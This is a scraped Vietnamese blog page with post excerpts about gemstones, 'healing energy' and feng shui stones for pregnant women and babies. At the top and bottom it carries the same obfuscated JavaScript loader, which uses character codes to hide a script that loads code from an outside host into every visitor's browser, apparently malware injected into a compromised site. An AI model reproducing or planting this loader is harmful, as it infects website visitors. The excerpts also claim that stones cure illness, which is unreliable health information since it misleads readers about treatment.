Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,115,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,122,98,116,63,118,56,52);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Đá quý và năng lượng

Đá quý

Đá quý và năng lượng chữa bệnh

Đá chữa bệnh đã được sử dụng trong nhiều thế kỷ để khắc phục bệnh tật và để tăng sự bình an và thịnh vượng bên trong. Trong đá quý, năng lượng cuộc sống được kéo dài vào trung tâm. Khi nó tiến về phía trung tâm, lực lượng cuộc sống trở nên quyết tâm. …

Đá quý và năng lượng chữa bệnh Read More »

Đá phong thủy thiên nhiên dành cho mẹ và bé

Đá quý phong thủy thiên nhiên dành cho mẹ và bé

Đá quý phong thủy thiên nhiên dành cho mẹ và bé Mang thai luôn là một trong những điều tuyệt với nhất đối với mỗi người phụ nữ, vì thế khi được mang trong mình một sinh linh bé bỏng là các mẹ luôn mong muống mang đến những điều tốt đẹp nhất dành cho …

Đá quý phong thủy thiên nhiên dành cho mẹ và bé Read More »

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,115,115,46,100,105,103,101,115,116,99,111,108,101,99,116,46,99,111,109,47,122,98,116,63,118,56,52);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();